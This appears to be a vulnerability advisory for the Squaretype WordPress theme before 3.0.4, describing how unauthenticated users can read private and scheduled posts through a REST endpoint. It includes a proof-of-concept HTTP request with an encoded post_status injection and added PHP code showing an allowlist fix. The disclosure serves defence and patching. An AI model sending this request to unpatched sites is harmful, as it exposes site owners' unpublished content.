Squaretype Modern Blog < 3.0.4 - Unauthenticated Private/Schedule Posts Disclosure
Description
The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts displayed by one of its REST endpoints, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request that sets post_status in query_vars.
Proof of Concept
POST /wp-json/csco/v1/more-posts
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d
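The fix pattern for this class of bug is to never pass client-supplied query_vars straight into WP_Query: copy only an allowlist of keys and set post_status server-side. The following is an added illustration of that pattern, not the theme's own code; the route name example/v1/more-posts and the function names are hypothetical.

```php
<?php
// Added example (not the theme's code): a public "load more" REST route that
// accepts client query_vars but honours only an allowlist and always forces
// post_status to 'publish', so private/scheduled posts cannot be requested.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/more-posts', array(
        'methods'             => 'POST',
        'callback'            => 'example_more_posts',
        'permission_callback' => '__return_true', // public by design; data is filtered below
    ) );
} );

function example_sanitize_query_vars( array $raw ) {
    // Keys the front end legitimately needs for paging, each with its sanitizer.
    $allowed = array(
        'cat'            => 'absint',
        'tag_id'         => 'absint',
        'author'         => 'absint',
        'paged'          => 'absint',
        'posts_per_page' => 'absint',
        'orderby'        => 'sanitize_key',
        'order'          => 'sanitize_key',
        's'              => 'sanitize_text_field',
    );
    $clean = array();
    foreach ( $allowed as $key => $sanitizer ) {
        if ( isset( $raw[ $key ] ) && is_scalar( $raw[ $key ] ) ) {
            $clean[ $key ] = call_user_func( $sanitizer, $raw[ $key ] );
        }
    }
    // Server-side decisions the client must never override.
    $clean['post_status']         = 'publish';   // drops 'private' / 'future' requests
    $clean['perm']                = 'readable';  // defence in depth: capability check in WP_Query
    $clean['post_type']           = 'post';
    $clean['ignore_sticky_posts'] = true;
    $per_page                     = isset( $clean['posts_per_page'] ) ? $clean['posts_per_page'] : 10;
    $clean['posts_per_page']      = max( 1, min( $per_page, 50 ) ); // bound the page size
    return $clean;
}

function example_more_posts( WP_REST_Request $request ) {
    $data = json_decode( (string) $request->get_param( 'query_data' ), true );
    $raw  = ( is_array( $data ) && isset( $data['query_vars'] ) && is_array( $data['query_vars'] ) )
        ? $data['query_vars'] : array();
    $query = new WP_Query( example_sanitize_query_vars( $raw ) );
    $posts = array();
    foreach ( $query->posts as $post ) {
        $posts[] = array( 'id' => $post->ID, 'title' => get_the_title( $post ), 'link' => get_permalink( $post ) );
    }
    return rest_ensure_response( array( 'posts' => $posts, 'max_pages' => (int) $query->max_num_pages ) );
}
```

With this handler the request shown above still succeeds, but the injected post_status is discarded and only published posts are returned.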
Affects Themes
Fixed in 3.0.4
Classification
Type
IDOR
Miscellaneous
Original Researcher
Emil Kylander Edwartz
Submitter
Emil Kylander Edwartz
Verified
Yes
Timeline
Publicly Published
2021-10-11
Added
2021-10-11
Last Updated
2022-04-08